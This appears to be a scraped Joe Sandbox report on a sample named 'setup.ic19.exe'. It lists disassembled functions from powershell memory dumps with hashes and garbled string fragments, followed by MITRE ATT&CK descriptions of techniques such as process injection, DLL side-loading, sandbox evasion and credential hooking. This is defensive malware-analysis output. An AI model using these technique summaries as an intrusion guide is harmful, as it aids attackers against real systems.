Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: d50cf79f92eab3679662143fde7218e742a94c8bd09300f36f54c79b027fdeee
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 2AE08631B04114978B189559E8154D9F7AADBCD220F04847AD91AA7340DE325915C7E1

Function 0279F540 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e30fad0036a3c6c06ea5e9838511510622a9db2adbd11e0e50ceae1d5b261504
Instruction ID: 99b9e98a48fe5b6c9efd8df6709f3a154df3aa2878f1f846954e3a6c7c9ae58a
Opcode Fuzzy Hash: e30fad0036a3c6c06ea5e9838511510622a9db2adbd11e0e50ceae1d5b261504
Instruction Fuzzy Hash: 06E01AB1D4021A8F8B94DFAC9541299FBF0AF08210B1089ABD919E7601E6329A528F91

Function 02798819 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bd8b57e46ae09d12f8085d1dd015c7cdf49db6cf1aa5a97e4e78004563aa594
Instruction ID: 7686febef0b671e6fa7179d1743a6a703818bd5d2fc761613940c3c36660af3a
Opcode Fuzzy Hash: 6bd8b57e46ae09d12f8085d1dd015c7cdf49db6cf1aa5a97e4e78004563aa594
Instruction Fuzzy Hash: 17E04F318041498BCB0CAB64F44B4EDBF70FA10301F00019ADD1693290EA341A9BCAD2

Function 027988E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0824904715cdec23e634e6b0d27fee671a985fa298f5d0e46bf5262dc0342cb8
Instruction ID: 4f8548fc2495f06ec2e6026f76a6ffd0f9fc0f759f1d49ea2da1f0622e41d979
Opcode Fuzzy Hash: 0824904715cdec23e634e6b0d27fee671a985fa298f5d0e46bf5262dc0342cb8
Instruction Fuzzy Hash: 8FE08631E04146CFCB08EFA4E48A4EE7FB0A745304F008195ED0597700DA305C81CB81

Function 0279F550 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: d178b7c692f3c718563910da32c3fd5b12f171e9de7e17f7fffe1c5e527071f4
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 31D067B0D042199F8B80EFADD94156EFBF4EB48200F6085AAC919E7301E7329A12CFD1

Function 02798828 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b32a0069fe291043742038a19c3761af5040224aec51db02feab05919dc7f404
Instruction ID: fcee9b4d7aed4b929897664bc8fd3d3b073c8c4186d13667d63e0c50c6cc6543
Opcode Fuzzy Hash: b32a0069fe291043742038a19c3761af5040224aec51db02feab05919dc7f404
Instruction Fuzzy Hash: BAD067318041198BCF0CABA4E85B8FEBB34FA14301F4042A9DE1793290EA751A5ACEC1

Function 027988F0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 958520b38ed1d088c4b18ba4931d302f758a185730700c5c45dc5b1d9151a9a7
Instruction ID: c84cd26787bff4b4c423e369480a0556883bfa133cc1101dad284f41892ca834
Opcode Fuzzy Hash: 958520b38ed1d088c4b18ba4931d302f758a185730700c5c45dc5b1d9151a9a7
Instruction Fuzzy Hash: 43D01734A0420A8FCB18EFA8E84B8AEBBB4AB45200F004269ED0A93340EA345C41CBC1

Function 02797F70 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926481e5712018fc50a4a70dd210ef8447a47a62ed6e0e8a87804dd84dd52205
Instruction ID: 058cea1827f8c4109151bcc0fdbbda276e91f957aec5aa90e7fe5fc78a98d62d
Opcode Fuzzy Hash: 926481e5712018fc50a4a70dd210ef8447a47a62ed6e0e8a87804dd84dd52205
Instruction Fuzzy Hash: C7C08C2BA4C2C24FEF0A8B3194180A16F729E4320030489A7C181C0097CA394108CB22

Function 02797A08 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21c65ccda2c760fd79c36bf450fcd6c98a4d6f207a16dadc6708350a40c42dcf
Instruction ID: a0b8243bddae38a720d51e537ccdd743f03cf39e35e3bf6d9f148c873c51b20f
Opcode Fuzzy Hash: 21c65ccda2c760fd79c36bf450fcd6c98a4d6f207a16dadc6708350a40c42dcf
Instruction Fuzzy Hash: 15B0923104430ECFC2096FB5E90981473A9BA4421938008A8E50E0B3928E3AE842CE45

Non-executed Functions

Function 06F31BE0 Relevance: 21.6, Strings: 17, Instructions: 394COMMON

Download Yara Rule

Strings

pi&j, xrefs: 06F31C73
$cQj, xrefs: 06F320B4
r^k, xrefs: 06F31C5D
J_k, xrefs: 06F32017
4'^q, xrefs: 06F31F89
tP^q, xrefs: 06F31FEB
J_k, xrefs: 06F31FA1
tP^q, xrefs: 06F31FDF
4'^q, xrefs: 06F31C92
J_k, xrefs: 06F320CE
J_k, xrefs: 06F320C2
4'^q, xrefs: 06F31C86
J_k, xrefs: 06F3200B
84\k, xrefs: 06F31F6C
84\k, xrefs: 06F31F76
r^k, xrefs: 06F31C53
4'^q, xrefs: 06F31F95

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID: $cQj$4'^q$4'^q$4'^q$4'^q$84\k$84\k$pi&j$tP^q$tP^q$J_k$J_k$J_k$J_k$J_k$r^k$r^k
API String ID: 0-4225698476
Opcode ID: effcbef5d44c74ae2f8fba55fc5c3d5c91ae5e55ebbcd6159eebf27a7ec13988
Instruction ID: 0a4ae2b0f12d1de05906ea38864ec69e669e0b2c2037e68b42fd290c1577f679
Opcode Fuzzy Hash: effcbef5d44c74ae2f8fba55fc5c3d5c91ae5e55ebbcd6159eebf27a7ec13988
Instruction Fuzzy Hash: ABD13532F042258FD764CB6998046AAFBF6AFC5310F18C4BBD4058B355DB32C98AC7A1

Function 06F30488 Relevance: 9.2, Strings: 7, Instructions: 495COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06F305F6
r^k, xrefs: 06F30935
4'^q, xrefs: 06F30962
fcq, xrefs: 06F3094B
4'^q, xrefs: 06F305EC
4'^q, xrefs: 06F3096E
r^k, xrefs: 06F3092B

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID: fcq$4'^q$4'^q$4'^q$4'^q$r^k$r^k
API String ID: 0-4009961678
Opcode ID: 6e2bd32da5e25560907c8c4e49134cb898ebc4124218e4d6d41ef3939de52e50
Instruction ID: 214993ca995ae023d8878f5368b6f3ad70c3141bbd8d6cf06290baee60b564a9
Opcode Fuzzy Hash: 6e2bd32da5e25560907c8c4e49134cb898ebc4124218e4d6d41ef3939de52e50
Instruction Fuzzy Hash: D3F13731F042258FE7659B68D8107ABBBA6AFC1310F1480BBD545CB396DE36C986C7E1

Function 06F33678 Relevance: 8.9, Strings: 7, Instructions: 191COMMON

Download Yara Rule

Strings

Tk, xrefs: 06F3387B
Tk, xrefs: 06F3386D
$^q, xrefs: 06F337FF
4'^q, xrefs: 06F33722
4'^q, xrefs: 06F3372E
$^q, xrefs: 06F33836
$^q, xrefs: 06F3382A

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$Tk$Tk
API String ID: 0-1125816424
Opcode ID: 0c1bfaa6843b282190beb1c9683cc1d921e709658450df196790ce33bbe92100
Instruction ID: 5d048f3ba6231192ec5249d274d7c58adfd0a1191d4cd7d91446fc34f35478ff
Opcode Fuzzy Hash: 0c1bfaa6843b282190beb1c9683cc1d921e709658450df196790ce33bbe92100
Instruction Fuzzy Hash: 46514A33F0C3A5DFE764DB2998006AABBE6AFC1751F24846BD405CB351DA35C845C7A2

Function 06F33928 Relevance: 8.9, Strings: 7, Instructions: 123COMMON

Download Yara Rule

Strings

Tk, xrefs: 06F33A1D
$^q, xrefs: 06F3396C
$^q, xrefs: 06F3393A
tP^q, xrefs: 06F339A5
$^q, xrefs: 06F33960
tP^q, xrefs: 06F339B1
Tk, xrefs: 06F33A0F

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q$$^q$Tk$Tk
API String ID: 0-1615174697
Opcode ID: a74ff78904ab22891815ec2a81953bad35548bde125a0e9cda6dd3346cd6ee31
Instruction ID: d6d1a5b594f1afda81a2b203af6686447af27100131b2084e8275fa25369c018
Opcode Fuzzy Hash: a74ff78904ab22891815ec2a81953bad35548bde125a0e9cda6dd3346cd6ee31
Instruction Fuzzy Hash: C2314C33B093A4CFD755CF299804626BBE6AFC5620B2581ABE445CF365CE32DC45C7A1

Function 06F32107 Relevance: 8.8, Strings: 7, Instructions: 82COMMON

Download Yara Rule

Strings

TcQj, xrefs: 06F321F2
$^q, xrefs: 06F32166
J_k, xrefs: 06F321BA
J_k, xrefs: 06F3214A
J_k, xrefs: 06F32156
$^q, xrefs: 06F32172
J_k, xrefs: 06F321C4

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID: TcQj$$^q$$^q$J_k$J_k$J_k$J_k
API String ID: 0-3618998439
Opcode ID: 591e0b5341063665d29ef2b7302d8ab35c32df97e93e3325e810f6188e4f0316
Instruction ID: 763e3ff2488912ebcdb4159d9b13042efb80b91ff924e72c6e5d2e54bbf1b98a
Opcode Fuzzy Hash: 591e0b5341063665d29ef2b7302d8ab35c32df97e93e3325e810f6188e4f0316
Instruction Fuzzy Hash: 70212832E0D3E14FE366562A5E10597AFB76BD360071A80EBD181CF396C93A8D45C7A2

Function 02797AE8 Relevance: 6.5, Strings: 5, Instructions: 245COMMON

Download Yara Rule

Strings

`_q, xrefs: 02797D0C
`_q, xrefs: 02797BEB
`_q, xrefs: 02797C6A
`_q, xrefs: 02797D8A
tM^k, xrefs: 02797B9C

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID: tM^k$`_q$`_q$`_q$`_q
API String ID: 0-3948421843
Opcode ID: e85f4c2cd7c1f9415d7f6169858218ca30aba5dbea6dfdc7e992629704c7ea2c
Instruction ID: b664b0ae419dd0b9e0e75ab8d1d4abf059bf143d0382eab2d3fe447503f7194d
Opcode Fuzzy Hash: e85f4c2cd7c1f9415d7f6169858218ca30aba5dbea6dfdc7e992629704c7ea2c
Instruction Fuzzy Hash: D6B1A2B4E002099FDB54DFA9D980A9DFBF2FF89300F108629D419AB355DB30A945CF90

Function 02797AF8 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

`_q, xrefs: 02797D0C
`_q, xrefs: 02797BEB
`_q, xrefs: 02797C6A
`_q, xrefs: 02797D8A
tM^k, xrefs: 02797B9C

Memory Dump Source

Source File: 0000000E.00000002.3215615794.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2790000_powershell.jbxd

Similarity

API ID:
String ID: tM^k$`_q$`_q$`_q$`_q
API String ID: 0-3948421843
Opcode ID: a5b8ec71bc3c5e7b13844d2558220507a84ffd10a456cecea75e59020e12a719
Instruction ID: 4ae37f056eea8bda854e40fb87da8e8ee72dde2f89d9b03171e92fd495122fee
Opcode Fuzzy Hash: a5b8ec71bc3c5e7b13844d2558220507a84ffd10a456cecea75e59020e12a719
Instruction Fuzzy Hash: F6B181B4E012199FDB54DFA9D980A9DFBF2FF89300F208629D419AB355DB30A945CF90

Function 06F3238C Relevance: 6.3, Strings: 5, Instructions: 66COMMON

Download Yara Rule

Strings

J_k, xrefs: 06F323D1
pi&j, xrefs: 06F323A0
J_k, xrefs: 06F323C5
pi&j, xrefs: 06F323B0
pi&j, xrefs: 06F32416

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID: pi&j$pi&j$pi&j$J_k$J_k
API String ID: 0-969070801
Opcode ID: f8a5503ba6e18e30732694c91020fcb8fbc994aabdf1236d7403e7438a0fb8b3
Instruction ID: 88d8b38ebeff023285ce3bafa77f57615d71373a46ccf6e4b2ab466a1f8fcb9b
Opcode Fuzzy Hash: f8a5503ba6e18e30732694c91020fcb8fbc994aabdf1236d7403e7438a0fb8b3
Instruction Fuzzy Hash: 9C215731B402189FDB549B6D95417AEBBE3AF84310F008479E8049F351CF36DE42C7A1

Function 06F33F28 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06F3418A
4'^q, xrefs: 06F34180
4'^q, xrefs: 06F34026
4'^q, xrefs: 06F34030

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: cee908ac3bb04f18ca0eca504137934a3b6ff03c738a66a33f486a38f753fd66
Instruction ID: bd995a6c54f3625d40b5dc834a44767586c82e539dba842b8b78888580a49f71
Opcode Fuzzy Hash: cee908ac3bb04f18ca0eca504137934a3b6ff03c738a66a33f486a38f753fd66
Instruction Fuzzy Hash: BD616B72F402258FDB599A6898102BABBE6AFD1210F14847ED412CF395DF35C852C7E1

Function 06F35798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 06F357F4
$^q, xrefs: 06F35800
$^q, xrefs: 06F357AA
$^q, xrefs: 06F357C6

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: e1c9bf3dce3a12eb69dfd0da6b5898d7aaf2bc6afc460369e278cbdd6bbeb1dd
Instruction ID: cde59c097e161b6e464698eb40bace872caf943af24eef719aca445b798f2bc6
Opcode Fuzzy Hash: e1c9bf3dce3a12eb69dfd0da6b5898d7aaf2bc6afc460369e278cbdd6bbeb1dd
Instruction Fuzzy Hash: 3E213B32F183299BEBB4692A9C10B6BBBDA5BC0711F24843AE506CF395DD75C845C3B1

Function 06F30308 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06F30373
$^q, xrefs: 06F3035E
$^q, xrefs: 06F30352
4'^q, xrefs: 06F3037F

Memory Dump Source

Source File: 0000000E.00000002.3226818010.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: b435eea02dd40533737997d24a2270b90a72c85a2f34ed3d28fdb0e4a502a88a
Instruction ID: 40199e07feffbd8e9e588f732dcb92599e0e28655012663898dbfa633f052fc0
Opcode Fuzzy Hash: b435eea02dd40533737997d24a2270b90a72c85a2f34ed3d28fdb0e4a502a88a
Instruction Fuzzy Hash: 3F01D611F4E3A54FD76B122818209666FB65FC390031A44EBD081CF3A7CD254D4D83B3

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report setup.ic19.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance
